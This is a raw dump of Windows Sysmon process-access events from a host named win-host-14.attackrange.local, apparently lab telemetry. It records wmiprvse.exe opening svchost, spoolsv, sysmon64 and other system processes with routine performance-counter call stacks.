21:45:41.495{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F66-60CA-2700-00000000D101}2648C:\Windows\system32\wbem\unsecapp.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150885Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.495{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1F00-00000000D101}1340C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150884Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.495{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1F00-00000000D101}1340C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150883Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.495{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1E00-00000000D101}1056C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150882Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.479{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1E00-00000000D101}1056C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150881Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.479{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150880Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.479{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150879Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.479{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1A00-00000000D101}1928C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150878Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.479{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1A00-00000000D101}1928C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150877Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.479{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1900-00000000D101}1808C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150876Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.479{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1900-00000000D101}1808C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150875Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.479{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1800-00000000D101}1548C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150874Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.479{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1800-00000000D101}1548C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150873Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.479{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1700-00000000D101}1284C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150872Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.479{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1700-00000000D101}1284C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150871Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.479{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1600-00000000D101}1164C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150870Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 